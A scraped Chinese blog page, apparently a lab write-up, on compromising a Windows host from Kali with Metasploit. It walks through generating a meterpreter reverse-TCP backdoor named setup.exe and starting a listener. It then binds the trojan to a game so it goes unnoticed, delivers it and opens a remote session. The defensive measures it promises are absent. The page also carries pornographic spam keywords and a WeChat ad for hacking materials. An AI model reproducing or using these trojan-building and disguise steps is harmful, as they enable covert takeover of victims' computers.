国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

Kali滲透Windows服務(wù)器

這篇具有很好參考價(jià)值的文章主要介紹了Kali滲透Windows服務(wù)器。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問(wèn)。

這個(gè)實(shí)驗(yàn)主要讓我們學(xué)習(xí)漏洞掃描技術(shù)基本原理,了解其在網(wǎng)絡(luò)攻防中的作用,掌握使用Kali中的Metasploit對(duì)目標(biāo)主機(jī)滲透,并根據(jù)報(bào)告做出相應(yīng)的防護(hù)措施。

本次實(shí)戰(zhàn)環(huán)境:Kali滲透Windows服務(wù)器

實(shí)戰(zhàn)步驟一

本實(shí)驗(yàn)通過(guò)利用kali進(jìn)行漏洞掃描,使用Metasploit對(duì)目標(biāo)主機(jī)進(jìn)行滲透測(cè)試,并根據(jù)報(bào)告做出相應(yīng)的防護(hù)措施,共分為3個(gè)實(shí)驗(yàn)步驟,詳情如下;

1、 實(shí)戰(zhàn)步驟一:生成setup.exe后門程序,即木馬程序。

(1) 打開kali終端,輸入ifconfig, 得到本機(jī)ip為192.168.189.130。

如下圖:

(2)輸入以下命令,使用msfpayload生成名為setup的后門程序:

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.189.130 x > setup.exe 如下圖:

(3) 進(jìn)入setup.exe所在目錄,修改屬性:選擇“允許以程序執(zhí)行文件”。

如下圖所示:

(4) 終端中輸入首先msfconsole;然后輸入use exploit/multi/handler來(lái)加載 exploit/multi/handler 模塊;輸入set LHOST 192.168.189.130來(lái)設(shè)置本地主機(jī);然后輸入exploit -z -j開始監(jiān)聽(tīng),如下圖所示:

實(shí)戰(zhàn)步驟二

將上面生成的木馬程序與某個(gè)軟件進(jìn)行捆綁。

【----幫助網(wǎng)安學(xué)習(xí),以下所有學(xué)習(xí)資料免費(fèi)領(lǐng)!加vx:yj009991,備注 “博客園” 獲??!】

?、?網(wǎng)安學(xué)習(xí)成長(zhǎng)路徑思維導(dǎo)圖
?、?60+網(wǎng)安經(jīng)典常用工具包
?、?100+SRC漏洞分析報(bào)告
?、?150+網(wǎng)安攻防實(shí)戰(zhàn)技術(shù)電子書
?、?最權(quán)威CISSP 認(rèn)證考試指南+題庫(kù)
?、?超1800頁(yè)CTF實(shí)戰(zhàn)技巧手冊(cè)
?、?最新網(wǎng)安大廠面試題合集(含答案)
?、?APP客戶端安全檢測(cè)指南(安卓+IOS)

(1)可以在windows系統(tǒng)下使用exe捆綁軟件將setup.exe和一個(gè)其他的某個(gè)安全軟件合并為一個(gè)軟件,這樣在運(yùn)行軟件時(shí)兩個(gè)軟件同時(shí)運(yùn)行,不會(huì)引起注意。在tools里面進(jìn)入名為exekunbang的文件,先打開ExeBinder.exe捆綁軟件。選擇第一個(gè)要合并的軟件,默認(rèn)選擇本軟件中自帶的小游戲程序:

點(diǎn)擊下一步,選擇第二個(gè)要捆綁的軟件,即之前生成的木馬程序setup.exe:

點(diǎn)擊下一步,選擇一個(gè)文件要保存的路徑:

繼續(xù)點(diǎn)擊下一步,開始捆綁軟件:

(2) 將捆綁后的軟件發(fā)送給目標(biāo)主機(jī)。

實(shí)戰(zhàn)步驟三

檢測(cè)目標(biāo)主機(jī),對(duì)目標(biāo)主機(jī)進(jìn)行滲透測(cè)試。

(2) 目標(biāo)主機(jī)執(zhí)行程序后,在kali終端中的檢測(cè)程序會(huì)及時(shí)檢測(cè)到。在檢測(cè)到目標(biāo)主機(jī)運(yùn)行程序后,后門程序會(huì)反向連接到msf,之后msf發(fā)起第二次攻擊(開始滲透),然后客戶端(后門程序)連接到服務(wù)端(msf)。輸入sessionss:

可以看到目標(biāo)主機(jī)的ip為192.168.189.129,

(2)再繼續(xù)輸入sessions -i 1,之后可以對(duì)目標(biāo)主機(jī)進(jìn)行一系列的操作。如輸入sysinfo可知道目標(biāo)主機(jī)的系統(tǒng)信息;輸入 getuid查看對(duì)方正在運(yùn)行的用戶。

要養(yǎng)成多思考多總結(jié)的習(xí)慣,對(duì)實(shí)驗(yàn)結(jié)果多去分析,這樣回收獲更多。比如如何利用kali進(jìn)行漏洞掃描;如何使用Metasploit對(duì)目標(biāo)主機(jī)進(jìn)行滲透測(cè)試;這些都是這次實(shí)戰(zhàn)后可以去思考的。

更多網(wǎng)安技能的在線實(shí)操練習(xí),請(qǐng)點(diǎn)擊這里>>

?文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-464709.html

到了這里,關(guān)于Kali滲透Windows服務(wù)器的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來(lái)自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 如何在Debian(kali)中配置代理(agent)服務(wù)器?

    如何在Debian(kali)中配置代理(agent)服務(wù)器?

    開始搭建代理服務(wù)器 首先我參考如下文章進(jìn)行搭建代理服務(wù)器,步驟每一個(gè)命令都執(zhí)行過(guò)報(bào)了各種錯(cuò),找了博客 ?目前尚未開始,我已經(jīng)知道我的路很長(zhǎng),很難走呀,加油,go!go!go! 第一個(gè)教程: Ubuntu/Debian/CentOS搭建Socks5代理一鍵腳本_socks5一鍵搭建腳本-CSDN博客 安裝 下載

    2024年02月10日
    瀏覽(21)
  • dns服務(wù)器地址大全 全國(guó)主要省份電信/網(wǎng)通/鐵通dns地址匯總

    在我們電腦使用局域網(wǎng)中,經(jīng)常會(huì)需要固定IP地址,如果選擇固定路由器IP地址,那么必將涉及到dns的填寫,dns是什么 dns服務(wù)器是什么?,簡(jiǎn)單的理解為時(shí)網(wǎng)絡(luò)提供商所在地的網(wǎng)絡(luò)服務(wù)器IP地址,我們選擇電信或網(wǎng)通等網(wǎng)絡(luò)商時(shí)一般當(dāng)?shù)厣碳叶加蠨NS服務(wù)器地址,如果僅僅是用戶

    2024年02月05日
    瀏覽(25)
  • 內(nèi)網(wǎng)滲透——macOS上搭建Web服務(wù)器

    內(nèi)網(wǎng)滲透——macOS上搭建Web服務(wù)器

    # 公網(wǎng)訪問(wèn)macOS本地web服務(wù)器【內(nèi)網(wǎng)穿透】 以macOS自帶的Apache為例,在本地啟用apache服務(wù)器,并通過(guò)cpolar內(nèi)網(wǎng)穿透將其暴露至公網(wǎng),實(shí)現(xiàn)在公網(wǎng)環(huán)境下訪問(wèn)本地web服務(wù)。 1. 啟動(dòng)Apache服務(wù)器 在macOS上打開終端,執(zhí)行命令啟動(dòng)Apache服務(wù)器,提示 Passwod ,輸入密碼 瀏覽器訪問(wèn)localh

    2024年02月08日
    瀏覽(20)
  • 【web滲透思路】敏感信息泄露(網(wǎng)站+用戶+服務(wù)器)

    【web滲透思路】敏感信息泄露(網(wǎng)站+用戶+服務(wù)器)

    ?? 博主:網(wǎng)絡(luò)安全領(lǐng)域狂熱愛(ài)好者(承諾在CSDN永久無(wú)償分享文章)。 殊榮:CSDN網(wǎng)絡(luò)安全領(lǐng)域優(yōu)質(zhì)創(chuàng)作者,2022年雙十一業(yè)務(wù)安全保衛(wèi)戰(zhàn)-某廠第一名,某廠特邀數(shù)字業(yè)務(wù)安全研究員,edusrc高白帽,vulfocus、攻防世界等平臺(tái)排名100+、高校漏洞證書、cnvd原創(chuàng)漏洞證書等。 擅長(zhǎng):

    2023年04月18日
    瀏覽(29)
  • 滲透測(cè)試之信息收集篇-服務(wù)器子域名收集

    滲透測(cè)試之信息收集篇-服務(wù)器子域名收集

    你可能對(duì)某個(gè)服務(wù)器滲透失敗,沒(méi)有發(fā)現(xiàn)入侵點(diǎn),所以我們可以考慮擴(kuò)大攻擊面,對(duì)target.com的子域名 進(jìn)行滲透,然后橫向移動(dòng)。 使用bbot對(duì)目標(biāo)子域進(jìn)行收集 https://github.com/blacklanternsecurity/bbot/wiki#installation 關(guān)于子域名收集,推薦一篇很好的文章,文章地址:https://blog.blackl

    2024年02月16日
    瀏覽(24)
  • 內(nèi)網(wǎng)滲透(八十一)之搭建Exchange服務(wù)器

    1、Windows Server 2012 R2以管理員身份運(yùn)行Windows Powershell,安裝必需的 Windows組件:

    2024年02月08日
    瀏覽(23)
  • “Couldn‘t agree a key exchange algorithm”,putty登錄服務(wù)器或winscp登錄服務(wù)器報(bào)這個(gè)錯(cuò)誤

    “Couldn‘t agree a key exchange algorithm”,putty登錄服務(wù)器或winscp登錄服務(wù)器報(bào)這個(gè)錯(cuò)誤

    “Couldn’t agree a key exchange algorithm”,putty登錄服務(wù)器或winscp登錄服務(wù)器報(bào)這個(gè)錯(cuò)誤 如圖,登錄報(bào)錯(cuò)怎么處理? 原因:隨著Linux版本的更新,服務(wù)器支持的加密算法也在不斷更新,而老版本的Putty不支持SSH服務(wù)器新的加密算法,就會(huì)出現(xiàn)這樣的問(wèn)題 解決方法:更新putty最新版本

    2024年02月11日
    瀏覽(26)
  • 網(wǎng)絡(luò)安全--Kali滲透Windows

    網(wǎng)絡(luò)安全--Kali滲透Windows

    這里我們學(xué)習(xí)使用Kali攻擊機(jī)來(lái)滲透Windows,這里使用的是msfvenom木馬來(lái)進(jìn)行滲透。 命令: msfvenom -p windows/meterpreter/reverse_tcp lhost=127.0.0.1 lport=4444 -f exe -o payload.exe 這里說(shuō)明一下,-p 是指使用的工具模塊,lhost是本機(jī)的IP地址,lport是本機(jī)的端口, -f 是指生成什么樣的文件,簡(jiǎn)稱指定

    2024年02月05日
    瀏覽(18)
  • kali系統(tǒng)復(fù)現(xiàn)環(huán)境:Vulfocus && 提示服務(wù)器內(nèi)部錯(cuò)誤,請(qǐng)聯(lián)系管理員的解決方法

    kali系統(tǒng)復(fù)現(xiàn)環(huán)境:Vulfocus && 提示服務(wù)器內(nèi)部錯(cuò)誤,請(qǐng)聯(lián)系管理員的解決方法

    第一步: 先下載docker和docker-compose 輸入如下圖命令,有版本顯示那就是成功安裝完成 ? ? 第二步: 完事后再去/etc/docker/ 下面創(chuàng)建一個(gè)daemon.json文件,編輯內(nèi)容為下面代碼,這一步是換docker源,為了更快的拉鏡像,不然太慢了 (如果你本身?yè)Q過(guò)docker源的話,直接跳到第三步

    2024年01月24日
    瀏覽(66)
  • Gartner發(fā)布服務(wù)器虛擬化市場(chǎng)指南:容器化、云原生已經(jīng)成為數(shù)據(jù)中心未來(lái)的主要發(fā)展方向

    Gartner發(fā)布服務(wù)器虛擬化市場(chǎng)指南:容器化、云原生已經(jīng)成為數(shù)據(jù)中心未來(lái)的主要發(fā)展方向

    ? 近日,國(guó)際知名權(quán)威分析機(jī)構(gòu)Gartner發(fā)布了《服務(wù)器虛擬化市場(chǎng)指南》。報(bào)告顯示云服務(wù)商和開源社區(qū)正在給服務(wù)器虛擬化領(lǐng)域帶來(lái)新一輪的創(chuàng)新,容器和虛擬機(jī)融合以及基于操作系統(tǒng)的容器虛擬化將在數(shù)據(jù)中心等領(lǐng)域獲得長(zhǎng)足的發(fā)展。同時(shí),服務(wù)器虛擬化的七大發(fā)展趨勢(shì)也

    2023年04月08日
    瀏覽(18)

覺(jué)得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包